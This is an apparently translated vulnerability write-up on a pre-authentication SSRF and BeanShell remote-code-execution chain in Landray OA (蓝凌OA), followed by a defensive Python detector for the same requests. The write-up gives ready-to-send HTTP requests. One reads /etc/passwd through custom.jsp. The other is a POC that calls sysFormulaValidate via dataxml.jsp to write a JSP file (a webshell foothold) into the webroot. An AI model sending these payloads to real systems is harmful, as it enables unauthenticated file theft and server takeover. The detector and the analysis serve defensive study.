
蓝凌OA (Landray OA) pre-authentication SSRF + dataxml.jsp RCE vulnerability analysis



SSRF vulnerability

Vulnerable path: /sys/ui/extend/varkind/custom.jsp

The <c:import> tag provides all the functionality of the <jsp:include> action tag, and additionally allows including absolute URLs. For example, <c:import> can be used to include a page served from a different FTP server.
url: the URL of the resource to import. It may be a relative or an absolute path, and it may point at resources on other hosts.

The <c:param> tag specifies parameters inside a <c:url> tag and takes care of URL encoding.
Within <c:param>, the name attribute gives the parameter name and the value attribute gives its value.

Reading files through the SSRF

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: 1.1.1.1
Content-Length: 42
Pragma: no-cache
Cache-Control: no-cache
Origin: http://1.1.1.1
Upgrade-Insecure-Requests: 1
DNT: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://1.1.1.1/sys/ui/extend/varkind/custom.jsp
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=060EB9D7EC3DA6E910B89F3D67BAB52C
Connection: close


var={"body":{"file":"file:///etc/passwd"}}

Arbitrary code execution through dataxml.jsp

Reference links: https://websecuritys.cn/archives/lanling2.html
https://blog.csdn.net/ouyang111222/article/details/48474189

POC

POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1
Host: 127.0.0.1
User-Agent: Go-http-client/1.1
Content-Length: 526
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip


var={"body":{"file":"/sys/common/dataxml.jsp"}}&s_bean=sysFormulaValidate&script=
import%20java.lang.*;import%20java.io.*;Class%20cls=Thread.currentThread().getContextClassLoader().loadClass("bsh.Interpreter");String%20path=cls.getProtectionDomain().getCodeSource().getLocation().getPath();File%20f=new%20File(path.split("WEB-INF")[0]%2B"/loginx.jsp");f.createNewFile();FileOutputStream%20fout=new%20FileOutputStream(f);fout.write(new%20sun.misc.BASE64Decoder().decodeBuffer("aGVsbG8="));fout.close();&type=int&modelName=test


… obtains the instantiated bean (or one defined in the XML), gets the bean name used in the getDataList call, invokes the bean with the request context, and then enters the getBean call with that parameter.


s_bean=sysFormulaValidate, so search for sysFormulaValidate.


It can be seen in spring.xml:


Open one of the jars and press Shift twice (search everywhere) on getDataList; it resolves to IXMLDataBean.class.


The interface is found:


It first reads the script parameter and then calls the parseValueScript function.


Keep following the call chain:


It first checks whether the script is NULL; if it is not, it strips trailing special characters and whitespace. It then checks whether a $ is present and, if so, enters a while loop that removes the $.


The request is handled dynamically, and the script finally reaches interpreter.eval().
bsh (BeanShell) Java code execution: https://blog.csdn.net/ouyang111222/article/details/48474189


Getting a shell by writing a file

import%20java.lang.*;import%20java.io.*;Class%20cls=Thread.currentThread().getContextClassLoader().loadClass("bsh.Interpreter");String%20path=cls.getProtectionDomain().getCodeSource().getLocation().getPath();File%20f=new%20File(path.split("WEB-INF")[0]%2B"/loginx.jsp");f.createNewFile();FileOutputStream%20fout=new%20FileOutputStream(f);fout.write(new%20sun.misc.BASE64Decoder().decodeBuffer("aGVsbG8="));fout.close();

Requesting loginx.jsp returns 200; spring.xml allows anonymous access.
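Added example, written for the defending side (this is not code from the post or from the vendor): a small Python detector for the two request patterns shown above. It parses a POST body sent to custom.jsp, decodes the var JSON that <c:import> consumes, and flags either an absolute URL in body.file (the SSRF primitive) or an include of dataxml.jsp combined with a script parameter (the BeanShell eval path). The sample bodies are constructed from the requests in the post; header.jsp is a made-up benign include.

```python
import json
from urllib.parse import unquote_plus

CUSTOM_JSP = "/sys/ui/extend/varkind/custom.jsp"
DATAXML_JSP = "/sys/common/dataxml.jsp"
# Schemes that turn <c:import> into an SSRF / local file read when passed as body.file.
ABSOLUTE_SCHEMES = ("file:", "http://", "https://", "ftp://", "jar:", "gopher://")

def parse_form(body):
    """Decode an application/x-www-form-urlencoded body, splitting on '&' only:
    the BeanShell script in the POC contains ';' which some parsers treat as a separator."""
    params = {}
    for pair in body.split("&"):
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params

def analyze_request(path, body):
    """Return findings for one POST to custom.jsp; an empty list means nothing matched."""
    if path.split("?", 1)[0] != CUSTOM_JSP:
        return []
    params = parse_form(body)
    try:
        target = str(json.loads(params.get("var", ""))["body"]["file"])
    except (ValueError, KeyError, TypeError):
        return ['custom.jsp: var is missing or not of the form {"body":{"file":...}}']
    findings = []
    if target.lower().startswith(ABSOLUTE_SCHEMES) or "://" in target:
        findings.append("SSRF: absolute URL passed to <c:import>: " + target)
    if target.endswith(DATAXML_JSP) and "script" in params:
        findings.append("RCE: dataxml.jsp included with script= (s_bean=%s)"
                        % params.get("s_bean", "?"))
    return findings

# Constructed sample bodies: the two patterns from the post, plus one benign relative include.
SAMPLES = {
    "ssrf": 'var={"body":{"file":"file:///etc/passwd"}}',
    "rce": 'var={"body":{"file":"/sys/common/dataxml.jsp"}}&s_bean=sysFormulaValidate'
           '&script=import%20java.lang.*;&type=int&modelName=test',
    "benign": 'var={"body":{"file":"/sys/ui/extend/varkind/header.jsp"}}',  # constructed path
}

def scan_samples():
    """Run the detector over every sample and return {name: findings}."""
    return {name: analyze_request(CUSTOM_JSP, body) for name, body in SAMPLES.items()}

if __name__ == "__main__":
    for name, findings in scan_samples().items():
        print(name, "->", findings or "clean")
```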
